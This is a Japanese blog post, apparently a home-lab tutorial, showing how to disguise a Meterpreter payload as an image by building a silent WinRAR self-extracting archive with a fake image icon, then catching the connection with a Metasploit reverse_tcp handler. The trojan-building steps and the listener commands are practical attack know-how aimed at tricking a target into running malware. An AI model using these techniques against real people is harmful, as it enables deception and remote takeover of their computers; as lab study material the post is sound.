ペイロードを画像ファイルにバインドする方法

Windows 10

今回は、ペイロードに画像ファイルをバインドします。
バインドする目的は前回の記事を参照。

画像の用意

なんでも良いので、画像ファイルを用意します。このブログで使用している以下の画像を使おうと思います。

この画像を Windows 10 に配置します。
なぜ Kali ではなくターゲット端末の Windows 10 に配置するかと言うと、単にバインド処理を Kali でさせるのが手間だからです。
WinRAR を使用してバインドするのですが、前回の記事で WinRAR を Windows 10 にインストールしているので、Windows 10 でバインドしてしまいます。

あくまで目的は「バインドされたファイルを実行した際の動作確認」です。

画像アイコンの作成

バインドしたファイルをターゲットに実行させる際、アイコンが画像用になっていれば、より不審に思われずファイルを実行することが考えられます。
以下のサイトにて画像ファイルのアイコンを作成します。

ICO Converter
Converts images to the ICO format for your websites or applications.

作成したアイコンファイルを Windows 10 に配置します。

WinRARによるバインド

Windows 10 で、画像ファイルとアイコンファイルを2つ選択した状態で右クリックして「書庫に圧縮」を選択します。

「全般」タブが開くので、書庫名を任意のファイル名に変更し、「自己解凍書庫を作成」にチェックを入れます。するとファイルの拡張子が exe に変わります。

「高度」タブを開き、自己解凍オプションをクリックします。

「セットアップ」タブをクリックし、「解凍後に実行」欄にペイロードと画像ファイルのファイル名を記入します。
※ペイロードは以下の記事で作成したものを使用します。

「モード」タブをクリックし、サイレントモードを「すべて隠す」を選択します。

「更新」タブをクリックし、更新モードを「新規と更新するファイル」に、上書きモードを「確認しないで上書き」に変更します。

「テキストとアイコン」タブで、作成したアイコンファイルを指定します。

その後OKをクリックすると、デスクトップ上にバインドされたファイルが作成されます。拡張子を表示していない状態であれば、exeファイルかどうかわからず画像ファイルと誤認しそうです。

リバースシェルの待受け

Kali を起動してリバースシェルを待ち受けます。

msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.0.0.2
lhost => 10.0.0.2
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.0.0.2:4444

バインドしたファイルの実行

ファイルを実行してみます。
すると、画像が開かれるのと同時に、セッションを確立しようとして一瞬で切断されました。

セッションは Windows Defender によって切断されてしまいましたが、ファイルの実行によりセッションを確立しようとしたことがわかりました。
ファイル名の拡張子を非表示にしていれば、単に画像ファイルを開いただけのような動きとなり、ペイロードが実行されているとは認識しないと思います。

今回は以上です。

くどり

この記事は「ハッキング・ラボのつくりかた 第4章 」をベースに作成しています。購入リンクは以下です。
※Amazonアソシエイトを使用しています。

コメント

タイトルとURLをコピーしました